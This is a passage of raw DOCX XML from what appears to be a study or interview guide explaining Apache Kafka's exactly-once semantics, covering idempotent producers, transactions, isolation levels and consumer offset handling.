        <w:t>: A number for each message sent by the producer to maintain order and ensure that duplicate messages are not written to the topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36BA2135" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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figuration</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The idempotent producer is enabled by setting acks=all and enable.idempotence=true in the producer configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D98AEB2" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F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2. Kafka Transactions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05729E3C" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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allows for transactions starting from </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka 0.11</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This enables producers to send multiple messages to one or more partitions atomically, i.e., either all the messages are committed or none are.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192D26C9" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146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A </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka transaction</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ensures that either all records within a transaction are successfully written to Kafka or none of them are, thus eliminating partial updates and preserving data consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7435AF54" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F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ey Concepts</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A942034" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147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Transactional Producer</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A producer that starts a transaction, sends multiple messages, and then either commits or aborts the transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA439F1" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147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Transaction Coordinator</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A special role in Kafka brokers that handles the transaction lifecycle, ensuring atomicity and consistency of message writes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4F9E3A" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147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Transaction Commit and Abort</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: After sending messages within a transaction, the producer can either commit or abort the transaction. If it commits, all messages in the transaction are visible to consumers. If it aborts, the messages are discarded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B760271" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F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roducer Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29488E0E" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147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ransactional.id: Enables the producer to identify itself as part of a transaction.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7E833B" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147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acks=all: Ensures that the producer waits for the message to be acknowledged by all replicas before committing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="137D479A" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F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3. Consumer Configuration for EOS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48309844" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147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consumers need to be able to read messages in an idempotent way while processing them to ensure that each message is processed exactly once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4E40D3" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147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afka Consumer Offset Management</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When a consumer processes a message, it commits the offset to Kafka. With exactly-once semantics, the consumer only commits the offset if it has successfully processed the message. In case of failure, the message is re-read, ensuring no message is lost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54198324" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147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lastRenderedPageBreak/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>isolation.level</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> setting is used to control how consumers read messages during transactions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C8E786" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="147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solation.level=read_committed</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ensures that consumers only see messages that have been committed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4366EBA7" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="147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solation.level=read_uncommitted</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows consumers to read both committed and uncommitted messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6B35C4" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F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mportant Considerations for Consumers</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51FA80B6" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147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Consumers can be configured to </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>read only committed messages</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a transactional setting (isolation.level=read_committed).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12289E29" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147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f an error occurs, consumers can roll back the offset to avoid processing the same message multiple times, ensuring the exact-once processing guarantee.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B484EC8" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F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Why Exactly-Once Semantics is Important?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600317DC" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F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Exactly-once semantics provide strong consistency guarantees, which are crucial for applications that require high integrity and correctness of data. Without this guarantee, you might face several issues:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B73E84" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147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uplicate Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If a message is processed more than once, it could lead to duplicated entries, double-spending, or other inconsistencies in downstream systems (e.g., financial transactions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE647DD" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147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ata Loss</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If a message is lost due to a producer failure, important events might not be captured, leading to incomplete processing or missing data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265FB125" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147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artial Updates</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Without EOS, if part of a transaction is committed and part fails, the system could end up with inconsistent states, leading to application errors or broken processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="401B9356" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147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Reliability</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Without EOS, consumers might process the same message multiple times, causing issues like incorrect state transitions or duplicate transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF01B3C" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F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By implementing EOS, Kafka ensures that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2251DA90" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147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Messages are reliably delivered and consumed exactly once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393A9344" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147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ducers can write messages atomically in batches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17306016" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147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sumers can read messages without missing or duplicating them, even in the face of failures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E2F14D" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F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Example of Exactly-Once Semantics in Action:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4FF17C" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147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roducer Side</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>A producer sends a transaction with three messages to a Kafka topic. If the producer crashes after sending two messages, Kafka will not commit the transaction. When the producer restarts, it can continue sending messages, but Kafka ensures the two previously sent messages are not reprocessed or committed twice.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF00C12" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147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Side</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t>A consumer reads a batch of messages from the topic. If the consumer processes the messages successfully, it commits the offset. In case of failure before the commit, the consumer can reprocess the batch of messages, but Kafka guarantees that each message is processed exactly once, even if there are retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030BE935" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F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Summary of How Exactly-Once Semantics Work:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFE417C" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147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roducer</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07232AD6" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="147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he producer uses </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>idempotent writes</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transactions</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure messages are sent exactly once, even if there are network issues or retries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2F16CD" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147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w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088AA61F" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="147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Consumers read </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>committed messages</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and commit offsets only after processing to ensure no duplicates or missed messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A139940" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147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Transactions</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEB099C" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="147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ransactions allow for atomic message writes, ensuring that all messages in a transaction are either written successfully or discarded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDC8BF4" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147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Atomicity and Durability</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF1C0DF" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F5" w:rsidP="0003272F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="147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s transactional model ensures that both producers and consumers can safely handle failures without data loss or duplication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4780EB73" w14:textId="77777777" w:rsidR="003E52F5" w:rsidRPr="0003272F" w:rsidRDefault="003E52F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s </w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Exactly-Once Semantics</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an advanced feature that ensures high data integrity and reliability for critical systems, providing the foundation for robust event-driven architectures, financial transactions, and systems requiring strong consistency guarantees.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25078850" w14:textId="79F320BF"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BC9E359">
          <v:rect id="_x0000_i3184" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D051AB6" w14:textId="61856F9A" w:rsidR="007C61B8" w:rsidRPr="00CE4B95" w:rsidRDefault="00246E17" w:rsidP="00DB22BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="801" w:name="_Toc196308281"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain Kafka’s exactly-once semantics, the configuration required to achieve it, and the scenarios where this feature is critical</w:t>
      </w:r>
      <w:r w:rsidR="007C61B8" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="801"/>
    </w:p>
    <w:p w14:paraId="25B32115" w14:textId="4FEF1A98" w:rsidR="00092929" w:rsidRPr="0003272F" w:rsidRDefault="00092929" w:rsidP="0003272F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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s Exactly-Once Semantics (EOS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6408DD39"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lastRenderedPageBreak/>
        <w:t>Exactly-Once Semantics (EOS)</w:t>
      </w:r>
      <w:r w:rsidRPr="0003272F">
        <w:rPr>
